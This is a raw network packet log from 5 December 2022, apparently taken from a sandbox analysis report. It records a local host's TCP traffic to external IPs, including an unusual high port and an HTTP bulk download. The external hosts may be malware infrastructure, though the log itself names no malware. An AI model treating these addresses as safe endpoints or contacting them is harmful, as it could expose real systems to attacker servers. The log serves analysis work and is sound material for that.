Dec 5, 2022 01:32:43.888092995 CET	443	49706	162.159.129.233	192.168.2.3
Dec 5, 2022 01:32:43.888170958 CET	49706	443	192.168.2.3	162.159.129.233
Dec 5, 2022 01:32:43.888235092 CET	443	49706	162.159.129.233	192.168.2.3
Dec 5, 2022 01:32:43.888300896 CET	49706	443	192.168.2.3	162.159.129.233
Dec 5, 2022 01:32:43.890691042 CET	443	49706	162.159.129.233	192.168.2.3
Dec 5, 2022 01:32:43.890779018 CET	49706	443	192.168.2.3	162.159.129.233
Dec 5, 2022 01:32:43.890808105 CET	443	49706	162.159.129.233	192.168.2.3
Dec 5, 2022 01:32:43.890873909 CET	49706	443	192.168.2.3	162.159.129.233
Dec 5, 2022 01:32:43.890963078 CET	443	49706	162.159.129.233	192.168.2.3
Dec 5, 2022 01:32:43.891037941 CET	49706	443	192.168.2.3	162.159.129.233
Dec 5, 2022 01:32:43.891053915 CET	443	49706	162.159.129.233	192.168.2.3
Dec 5, 2022 01:32:43.891113043 CET	443	49706	162.159.129.233	192.168.2.3
Dec 5, 2022 01:32:43.891551971 CET	49706	443	192.168.2.3	162.159.129.233
Dec 5, 2022 01:32:43.894269943 CET	49706	443	192.168.2.3	162.159.129.233
Dec 5, 2022 01:32:45.725414038 CET	49703	36457	192.168.2.3	45.15.157.131
Dec 5, 2022 01:32:45.778866053 CET	36457	49703	45.15.157.131	192.168.2.3
Dec 5, 2022 01:32:45.779318094 CET	49703	36457	192.168.2.3	45.15.157.131
Dec 5, 2022 01:32:45.828744888 CET	36457	49703	45.15.157.131	192.168.2.3
Dec 5, 2022 01:32:45.829147100 CET	49703	36457	192.168.2.3	45.15.157.131
Dec 5, 2022 01:32:45.877727985 CET	36457	49703	45.15.157.131	192.168.2.3
Dec 5, 2022 01:32:45.878123999 CET	49703	36457	192.168.2.3	45.15.157.131
Dec 5, 2022 01:32:45.928847075 CET	36457	49703	45.15.157.131	192.168.2.3
Dec 5, 2022 01:32:45.936070919 CET	49703	36457	192.168.2.3	45.15.157.131
Dec 5, 2022 01:32:46.013343096 CET	36457	49703	45.15.157.131	192.168.2.3
Dec 5, 2022 01:32:46.047161102 CET	36457	49703	45.15.157.131	192.168.2.3
Dec 5, 2022 01:32:46.159235001 CET	49703	36457	192.168.2.3	45.15.157.131
Dec 5, 2022 01:32:48.556365013 CET	49703	36457	192.168.2.3	45.15.157.131
Dec 5, 2022 01:32:55.632395983 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:55.655208111 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:55.655895948 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:55.656409025 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:55.679243088 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:55.915488958 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:55.915550947 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:55.915568113 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:55.915615082 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:55.916966915 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:55.917017937 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:55.917022943 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:55.917783976 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:55.919061899 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:55.919109106 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:55.919120073 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:55.919161081 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:55.920644045 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:55.920702934 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.809207916 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.832006931 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.868275881 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.868339062 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.868344069 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.868392944 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.869846106 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.869910955 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.869932890 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.869976997 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.871258974 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.871304035 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.871376991 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.872664928 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.872906923 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.882901907 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.882976055 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.882993937 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.883038998 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.884289980 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.884334087 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.884361982 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.884387970 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.885862112 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.885905981 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.885936022 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.885956049 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.887376070 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.887419939 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.887521029 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.889451027 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.889492989 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.889512062 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.889556885 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.891036987 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.891079903 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.891149998 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.893205881 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.893249989 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.893294096 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.893294096 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.894803047 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.894848108 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.894915104 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.896797895 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.896886110 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.897461891 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.897583961 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.898907900 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.898953915 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.898977041 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.899004936 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.899949074 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.899992943 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.900013924 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.900044918 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.902070999 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.902113914 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.902127028 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.902154922 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.908472061 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.908531904 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.908531904 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.909118891 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.909967899 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.910011053 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.910031080 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.910056114 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.910989046 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.911032915 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.911046028 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.911093950 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.912003040 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.912046909 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.912077904 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.912100077 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.913605928 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.913647890 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.913702011 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.915107012 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.915148973 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.915169954 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.915205002 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.916208029 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.916250944 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.916285992 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.916304111 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.917231083 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.917273998 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.917325020 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.917743921 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.917790890 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.917793989 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.917843103 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.918817043 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.918859005 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.918910980 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.919858932 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.919899940 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.919924974 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.919945955 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.920937061 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.920978069 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.920991898 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.921032906 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.921534061 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.921576023 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.921606064 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.921626091 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.922450066 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.922492027 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.922525883 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.922544003 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.923491001 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.923532963 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.923549891 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.923585892 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.924036026 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.924078941 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.924097061 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.924123049 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.925101995 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.925144911 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.925194979 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.925652981 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.925693989 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.925741911 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.926723003 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.926769018 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.926810980 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.926832914 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.927788019 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.927834988 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.927937984 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.928248882 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.928292990 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.928319931 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.928352118 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.929318905 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.929358959 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.929420948 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.930341959 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.930383921 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.930413008 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.930448055 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.931427002 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.931469917 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.931548119 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.932507992 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.932549953 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.932571888 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.932596922 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.933525085 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.933567047 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.933634043 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.933978081 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.934019089 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.934046984 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.934082985 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.934516907 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.934559107 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.934612989 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.935581923 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.935622931 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.935679913 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.936096907 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.936140060 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.936167002 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.936619043 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.936661005 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.936667919 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.936695099 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.936711073 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.937160015 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.937201977 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.937227011 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.937246084 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.938186884 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.938229084 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.938257933 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.938308001 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.938697100 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.938739061 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.938760996 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.938783884 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.939237118 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.939280987 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.939292908 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.939343929 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.940321922 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.940363884 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.940406084 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.940426111 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.940465927 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.940876961 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.940917969 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.940958977 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.940974951 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.941009045 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.941932917 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.941973925 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.942002058 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.942014933 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.942019939 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.942969084 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.943011045 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.943032980 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.943052053 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.943063974 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.943099976 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.943994999 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.944036007 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.944077969 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.944094896 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.944123030 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.944473028 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.944514990 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.944554090 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.944566011 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.944602966 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.945559025 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.945599079 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.945641994 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.945662975 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.945699930 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.946109056 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.946151972 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.946171045 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.946192980 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.946203947 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.946240902 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.947137117 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.947177887 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.947218895 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.947236061 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.947274923 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.947633982 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.947674990 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.947715044 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.947729111 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.947757006 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.947772980 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.947804928 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.948704958 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.948796034 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.948836088 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.948856115 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.948877096 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.948890924 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.948929071 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.949736118 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.949779987 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.949800968 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.949820042 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.949831009 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.949860096 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.949872017 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.949911118 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.950814009 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.950855017 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.950887918 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.950913906 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.950916052 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.950958014 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.950968027 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.951010942 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.951839924 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.951881886 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.951898098 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.951920986 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.951932907 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.951973915 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.952357054 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.952399015 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.952430010 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.952436924 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.952454090 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.952478886 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.952486992 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.952529907 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.953428984 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.953470945 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.953511953 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.953535080 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.953535080 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.953552961 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.953594923 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.953607082 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.953648090 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.953938007 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.953979969 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.954020977 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.954031944 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.954061031 CET	80	49707	77.73.133.23	192.168.2.3
